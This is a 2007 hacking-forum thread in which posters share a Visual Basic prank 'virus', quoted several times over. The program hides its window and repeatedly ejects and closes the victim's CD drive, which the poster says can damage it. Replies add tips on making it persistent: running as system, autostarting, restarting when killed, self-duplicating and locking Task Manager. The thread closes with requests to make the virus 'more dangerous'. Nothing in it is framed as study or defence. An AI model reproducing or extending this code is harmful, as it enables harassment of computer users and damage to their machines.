Posted: Fri Aug 31, 2007 1:55 am
that is really not the way of the hacker.
you mean to broke his computertreborguile wrote:that is really not the way of the hacker.
hehehe<<D.A.>> wrote:it's ain't the way of a hacker... IT'S THE WAY OF A CRAZY PSYCHO!!!!!!
hahahahahajack krauser wrote:hehehe<<D.A.>> wrote:it's ain't the way of a hacker... IT'S THE WAY OF A CRAZY PSYCHO!!!!!!
hey do you know any other good virus? not faketreborguile wrote:hahahahahajack krauser wrote:hehehe<<D.A.>> wrote:it's ain't the way of a hacker... IT'S THE WAY OF A CRAZY PSYCHO!!!!!!
what do you mean it didn't work?koolpop0 wrote:cdaudio don't work for me help?
Oke, bro ... This code work 100%. But, if you use this code:treborguile wrote:Ok this virus is very nasty...it causes the CD drive 2 eject and load at intervals of 2 seconds,u cant stop it directly.......it can even damage ur CD drives....ok here goes the code ....this shud b coded in VB.....
Private Declare Function mciSendString Lib "winmm.dll" Alias _
"mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Dim retvalue As Long
Private Sub Form_Load()
Form1.Hide
t.interval=2000
End Sub
Private Sub t_Timer()
Static a As Boolean
a = Not (a)
Select Case a
Case True
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
Case False
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Select
End Sub
any other tricks?Necklord wrote:Oke, bro ... This code work 100%. But, if you use this code:treborguile wrote:Ok this virus is very nasty...it causes the CD drive 2 eject and load at intervals of 2 seconds,u cant stop it directly.......it can even damage ur CD drives....ok here goes the code ....this shud b coded in VB.....
Private Declare Function mciSendString Lib "winmm.dll" Alias _
"mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Dim retvalue As Long
Private Sub Form_Load()
Form1.Hide
t.interval=2000
End Sub
Private Sub t_Timer()
Static a As Boolean
a = Not (a)
Select Case a
Case True
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
Case False
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Select
End Sub
1. Computer'll be slower.
2. You cann't put another code, like code to make virus duplicate. Because, program'll focus to this code.
If you wan't make powerfull virus i've some tricks. Make virus like KSPoold (can login as system). And make it to start automaticly. So, if user terminate it, it'll start again. Then, put your code more free. Because, your virus'll save!! (You won't put the lock task manager code)
Use private lib (vb)jack krauser wrote:any other tricks?Necklord wrote:Oke, bro ... This code work 100%. But, if you use this code:treborguile wrote:Ok this virus is very nasty...it causes the CD drive 2 eject and load at intervals of 2 seconds,u cant stop it directly.......it can even damage ur CD drives....ok here goes the code ....this shud b coded in VB.....
Private Declare Function mciSendString Lib "winmm.dll" Alias _
"mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Dim retvalue As Long
Private Sub Form_Load()
Form1.Hide
t.interval=2000
End Sub
Private Sub t_Timer()
Static a As Boolean
a = Not (a)
Select Case a
Case True
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
Case False
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Select
End Sub
1. Computer'll be slower.
2. You cann't put another code, like code to make virus duplicate. Because, program'll focus to this code.
If you wan't make powerfull virus i've some tricks. Make virus like KSPoold (can login as system). And make it to start automaticly. So, if user terminate it, it'll start again. Then, put your code more free. Because, your virus'll save!! (You won't put the lock task manager code)
what is private lib? it's a programme?Necklord wrote:Use private lib (vb)jack krauser wrote:any other tricks?Necklord wrote: Oke, bro ... This code work 100%. But, if you use this code:
1. Computer'll be slower.
2. You cann't put another code, like code to make virus duplicate. Because, program'll focus to this code.
If you wan't make powerfull virus i've some tricks. Make virus like KSPoold (can login as system). And make it to start automaticly. So, if user terminate it, it'll start again. Then, put your code more free. Because, your virus'll save!! (You won't put the lock task manager code)
hahaha upgrading it will be nicejack krauser wrote:what is private lib? it's a programme?Necklord wrote:Use private lib (vb)jack krauser wrote: any other tricks?
more dangeroustreborguile wrote:hahaha upgrading it will be nicejack krauser wrote:what is private lib? it's a programme?Necklord wrote: Use private lib (vb)
post ur ideas guys to make this virus more dangerous...